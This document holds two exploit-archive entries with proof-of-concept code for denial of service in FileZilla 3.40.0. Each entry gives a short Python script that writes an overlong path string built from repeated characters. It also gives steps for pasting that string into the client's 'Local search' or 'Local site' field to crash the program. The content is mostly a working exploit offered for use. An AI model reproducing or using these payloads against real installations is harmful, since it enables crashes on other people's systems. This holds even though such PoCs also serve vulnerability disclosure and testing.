# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC) # Discovery by: Mr Winst0n # Discovery Date: February 20, 2019 # Vendor Homepage: https://filezilla-project.org # Software Link : https://filezilla-project.org/download.php?type=client&show_all=1 # Tested Version: 3.40.0 # Tested on: Kali linux x86_64 # Vulnerability Type: Denial of Service (DoS) # Steps to Produce the Crash: # 1.- Run python code : python filezilla.py # 2.- Open buff.txt and copy content to clipboard # 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively) # 4.- In the opend window, Set Search type to "Local search" # 5.- Paste ClipBoard on "Search directory" and click on "Search" # 6.- Boom! Crashed... #!/usr/bin/env python buffer = "\x41" * 384 crash = "/" + buffer + "BBBB" + "CCCC" f = open("buff.txt", "w") f.write(crash) f.close() # Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path. # Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC) # Discovery by: Mr Winst0n # Discovery Date: February 25, 2019 # Vendor Homepage: https://filezilla-project.org # Software Link : https://filezilla-project.org/download.php?type=client&show_all=1 # Tested Version: 3.40.0 # Tested on: Kali linux x86_64 # Vulnerability Type: Denial of Service (DoS) # Steps to Produce the Crash: # 1.- Run python code : python filezilla-2.py # 2.- Open crash.txt and copy content to clipboard # 3.- In "Local site" section paste clipboard and Enter. # 4.- Boom! Crashed... #!/usr/bin/env python buffer = "\x41" * 384 crash = "/" + buffer + "BBBB" + "CCCC" f = open("crash.txt", "w") f.write(crash) f.close() # Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.